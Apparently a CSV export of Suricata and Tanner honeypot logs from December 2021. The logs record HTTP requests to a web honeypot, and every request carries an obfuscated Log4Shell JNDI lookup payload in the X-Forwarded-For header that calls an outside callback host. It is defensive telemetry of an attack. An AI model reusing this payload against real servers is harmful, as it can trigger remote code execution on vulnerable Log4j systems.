deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":10424}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.65.97.119",51588,,,,,,,,,,,,easternfingernail,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T10:40:35.486647+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T10:40:35.486Z",1,xbiuvX0BCXMCNTQLECwH,"logstash-suricata-2021.12.15",,"_doc","b148a344-a735-455a-962f-049832e5aea5",d732b3b75613,"4ed4dd0a-7d6e-4feb-a94f-8ef7008a16e9",d732b3b75613,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"159.65.97.119",51588,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text, with very long lines (1488)",51cdc5a4827fd0f112758593f673c970,"[]",10424,CLOSED,false,1,,,,,,,1562396462322105,"Digital Ocean, Inc.",14061,Bengaluru,AS,IN,IN,India,,"172.16.0.42","12.9771","{""lon"":77.5871,""lat"":12.9771}","77.5871",560100,KA,Karnataka,"Asia/Kolkata",,,,,,,,,,,,,,,d732b3b75613,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",10424,"HTTP/1.1",200,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",47463080,,"{""timestamp"":""2021-12-15T10:40:35.486647+0000"",""flow_id"":1562396462322105,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""159.65.97.119"",""dest_port"":51588,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":10424},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (1488)"",""gaps"":false,""state"":""CLOSED"",""md5"":""51cdc5a4827fd0f112758593f673c970"",""stored"":false,""size"":10424,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,easternfingernail,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:40:35.486647+0000",,,,,,,,,Suricata,,,,
"2021-12-15T10:40:35.218Z",1,0yOuvX0B5e7x5EYnCtD1,"logstash-tanner-2021.12.15",,"_doc","b148a344-a735-455a-962f-049832e5aea5",d732b3b75613,"4ed4dd0a-7d6e-4feb-a94f-8ef7008a16e9",d732b3b75613,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"72c5fa27-eceb-4e20-824a-05cf117778a8",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Santa Clara",NA,US,US,"United States",807,"159.65.97.119","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=72c5fa27-eceb-4e20-824a-05cf117778a8",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",d732b3b75613,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",60933,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=72c5fa27-eceb-4e20-824a-05cf117778a8""}, ""uuid"": ""b868d0fa-3d8d-4273-bed1-6395dbfd3241"", ""peer"": {""ip"": ""159.65.97.119"", ""port"": 51588}, ""status"": 200, ""cookies"": {""sess_uuid"": ""72c5fa27-eceb-4e20-824a-05cf117778a8""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""9498e584-929d-4e02-a668-7e37f4a03d6a""}}}, ""timestamp"": ""2021-12-15T10:40:35.218256""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","9498e584-929d-4e02-a668-7e37f4a03d6a","0.6.0",,,,,,,,,,,,,,,,,,"159.65.97.119",51588,,,,,,,,,200,,,easternfingernail,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T10:40:35.218256",,,,,,,,,Tanner,,,"b868d0fa-3d8d-4273-bed1-6395dbfd3241",
"2021-12-15T10:40:35.178Z",1,"_SOuvX0B5e7x5EYnENAf","logstash-suricata-2021.12.15",,"_doc","b148a344-a735-455a-962f-049832e5aea5",d732b3b75613,"4ed4dd0a-7d6e-4feb-a94f-8ef7008a16e9",d732b3b75613,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1562396462322105,,,"Santa Clara",NA,US,US,"United States",807,"159.65.97.119","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,d732b3b75613,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",13383,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",47460956,,"{""timestamp"":""2021-12-15T10:40:35.178464+0000"",""flow_id"":1562396462322105,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.65.97.119"",""src_port"":51588,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":13383}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.65.97.119",51588,,,,,,,,,,,,easternfingernail,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T10:40:35.178464+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T10:40:35.178Z",1,w7iuvX0BCXMCNTQLECwH,"logstash-suricata-2021.12.15",,"_doc","b148a344-a735-455a-962f-049832e5aea5",d732b3b75613,"4ed4dd0a-7d6e-4feb-a94f-8ef7008a16e9",d732b3b75613,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"159.65.97.119",51588,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text, with very long lines (1186)",c9c65774fd2401c660a14616a73a1890,"[]",13383,CLOSED,false,0,,,,,,,1562396462322105,"Digital Ocean, Inc.",14061,Bengaluru,AS,IN,IN,India,,"172.16.0.42","12.9771","{""lon"":77.5871,""lat"":12.9771}","77.5871",560100,KA,Karnataka,"Asia/Kolkata",,,,,,,,,,,,,,,d732b3b75613,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",13383,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",47461597,,"{""timestamp"":""2021-12-15T10:40:35.178464+0000"",""flow_id"":1562396462322105,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""159.65.97.119"",""dest_port"":51588,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":13383},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (1186)"",""gaps"":false,""state"":""CLOSED"",""md5"":""c9c65774fd2401c660a14616a73a1890"",""stored"":false,""size"":13383,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,easternfingernail,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:40:35.178464+0000",,,,,,,,,Suricata,,,,
"2021-12-15T10:40:34.678Z",1,tIauvX0B6VkG8jKzCp3y,"logstash-tanner-2021.12.15",,"_doc","b148a344-a735-455a-962f-049832e5aea5",d732b3b75613,"4ed4dd0a-7d6e-4feb-a94f-8ef7008a16e9",d732b3b75613,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Santa Clara",NA,US,US,"United States",807,"159.65.97.119","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",d732b3b75613,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",60155,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""b868d0fa-3d8d-4273-bed1-6395dbfd3241"", ""peer"": {""ip"": ""159.65.97.119"", ""port"": 51588}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""72c5fa27-eceb-4e20-824a-05cf117778a8""}}}, ""timestamp"": ""2021-12-15T10:40:34.678341""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","72c5fa27-eceb-4e20-824a-05cf117778a8","0.6.0",,,,,,,,,,,,,,,,,,"159.65.97.119",51588,,,,,,,,,200,,,easternfingernail,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T10:40:34.678341",,,,,,,,,Tanner,,,"b868d0fa-3d8d-4273-bed1-6395dbfd3241",
"2021-12-15T10:14:25.662Z",1,Q4WWvX0B6VkG8jKzEdea,"logstash-suricata-2021.12.15",,"_doc","2024c884-a194-4633-950c-0c62617862fb",a881cb080aae,"7f0af17a-0900-4f3b-847c-41a3701bec36",a881cb080aae,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,778633547479960,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"159.203.13.133","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,a881cb080aae,"gzip, deflate",,,,"172.16.0.42","image/png",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",3631,"HTTP/1.1",200,"/core/img/favicon-touch.png",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",23687293,,"{""timestamp"":""2021-12-15T10:14:25.662096+0000"",""flow_id"":778633547479960,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.203.13.133"",""src_port"":45508,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":2,""http"":{""hostname"":""172.16.0.42"",""url"":""/core/img/favicon-touch.png"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/png"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":3631}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.203.13.133",45508,,,,,,,,,,,,giantmole,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:25.662096+0000",,,,,,,,2,Suricata,,,,
"2021-12-15T10:14:25.662Z",1,RIWWvX0B6VkG8jKzEdea,"logstash-suricata-2021.12.15",,"_doc","2024c884-a194-4633-950c-0c62617862fb",a881cb080aae,"7f0af17a-0900-4f3b-847c-41a3701bec36",a881cb080aae,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"159.203.13.133",45508,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/core/img/favicon-touch.png",false,"PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced",da318bff7465546a1d7ac2b31fd38967,"[]",3631,CLOSED,false,2,,,,,,,778633547479960,Forthnet,1241,Toronto,NA,CA,CA,Canada,,"172.16.0.42","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,a881cb080aae,,,,,"172.16.0.42","image/png",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",3631,"HTTP/1.1",200,"/core/img/favicon-touch.png",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,"known attacker",,,,,,,"/data/suricata/log/eve.json",23687961,,"{""timestamp"":""2021-12-15T10:14:25.662096+0000"",""flow_id"":778633547479960,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""159.203.13.133"",""dest_port"":45508,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/core/img/favicon-touch.png"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/png"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":3631},""app_proto"":""http"",""fileinfo"":{""filename"":""/core/img/favicon-touch.png"",""sid"":[],""magic"":""PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced"",""gaps"":false,""state"":""CLOSED"",""md5"":""da318bff7465546a1d7ac2b31fd38967"",""stored"":false,""size"":3631,""tx_id"":2}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,giantmole,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:25.662096+0000",,,,,,,,,Suricata,,,,
"2021-12-15T10:14:25.656Z",1,D4WWvX0B6VkG8jKzDNdN,"logstash-tanner-2021.12.15",,"_doc","2024c884-a194-4633-950c-0c62617862fb",a881cb080aae,"7f0af17a-0900-4f3b-847c-41a3701bec36",a881cb080aae,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"80f29291-944e-47c4-94ca-29a51e906455",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"159.203.13.133","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=80f29291-944e-47c4-94ca-29a51e906455",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",a881cb080aae,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",30170,,"{""method"": ""GET"", ""path"": ""/core/img/favicon-touch.png"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=80f29291-944e-47c4-94ca-29a51e906455""}, ""uuid"": ""cf0d8729-adb3-470a-b138-48afff4aada4"", ""peer"": {""ip"": ""159.203.13.133"", ""port"": 45508}, ""status"": 200, ""cookies"": {""sess_uuid"": ""80f29291-944e-47c4-94ca-29a51e906455""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""10f735cb-baa0-45b8-a4e5-46e91c21ca7b""}}}, ""timestamp"": ""2021-12-15T10:14:25.656776""}",,,,,,GET,,,,,,"/core/img/favicon-touch.png",,,,,,,,,,,index,1,1,"0.6.0","10f735cb-baa0-45b8-a4e5-46e91c21ca7b","0.6.0",,,,,,,,,,,,,,,,,,"159.203.13.133",45508,,,,,,,,,200,,,giantmole,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:25.656776",,,,,,,,,Tanner,,,"cf0d8729-adb3-470a-b138-48afff4aada4",
"2021-12-15T10:14:25.637Z",1,QYWWvX0B6VkG8jKzEdea,"logstash-suricata-2021.12.15",,"_doc","2024c884-a194-4633-950c-0c62617862fb",a881cb080aae,"7f0af17a-0900-4f3b-847c-41a3701bec36",a881cb080aae,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,778633547479960,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"159.203.13.133","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,a881cb080aae,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",208,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",23685819,,"{""timestamp"":""2021-12-15T10:14:25.637124+0000"",""flow_id"":778633547479960,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.203.13.133"",""src_port"":45508,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":208}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.203.13.133",45508,,,,,,,,,,,,giantmole,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:25.637124+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T10:14:25.637Z",1,QoWWvX0B6VkG8jKzEdea,"logstash-suricata-2021.12.15",,"_doc","2024c884-a194-4633-950c-0c62617862fb",a881cb080aae,"7f0af17a-0900-4f3b-847c-41a3701bec36",a881cb080aae,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"159.203.13.133",45508,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text",838827d66cb0bd3693641815c694ca88,"[]",208,CLOSED,false,1,,,,,,,778633547479960,Forthnet,1241,Toronto,NA,CA,CA,Canada,,"172.16.0.42","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,a881cb080aae,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",208,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,"known attacker",,,,,,,"/data/suricata/log/eve.json",23686471,,"{""timestamp"":""2021-12-15T10:14:25.637124+0000"",""flow_id"":778633547479960,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""159.203.13.133"",""dest_port"":45508,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":208},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""838827d66cb0bd3693641815c694ca88"",""stored"":false,""size"":208,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,giantmole,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:25.637124+0000",,,,,,,,,Suricata,,,,
"2021-12-15T10:14:25.632Z",1,DoWWvX0B6VkG8jKzDNdN,"logstash-tanner-2021.12.15",,"_doc","2024c884-a194-4633-950c-0c62617862fb",a881cb080aae,"7f0af17a-0900-4f3b-847c-41a3701bec36",a881cb080aae,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"80f29291-944e-47c4-94ca-29a51e906455",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"159.203.13.133","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=80f29291-944e-47c4-94ca-29a51e906455",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",a881cb080aae,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",29285,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=80f29291-944e-47c4-94ca-29a51e906455""}, ""uuid"": ""cf0d8729-adb3-470a-b138-48afff4aada4"", ""peer"": {""ip"": ""159.203.13.133"", ""port"": 45508}, ""status"": 200, ""cookies"": {""sess_uuid"": ""80f29291-944e-47c4-94ca-29a51e906455""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""10f735cb-baa0-45b8-a4e5-46e91c21ca7b""}}}, ""timestamp"": ""2021-12-15T10:14:25.632330""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","10f735cb-baa0-45b8-a4e5-46e91c21ca7b","0.6.0",,,,,,,,,,,,,,,,,,"159.203.13.133",45508,,,,,,,,,200,,,giantmole,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:25.632330",,,,,,,,,Tanner,,,"cf0d8729-adb3-470a-b138-48afff4aada4",
"2021-12-15T10:14:25.603Z",1,P4WWvX0B6VkG8jKzEdea,"logstash-suricata-2021.12.15",,"_doc","2024c884-a194-4633-950c-0c62617862fb",a881cb080aae,"7f0af17a-0900-4f3b-847c-41a3701bec36",a881cb080aae,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,778633547479960,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"159.203.13.133","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,a881cb080aae,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 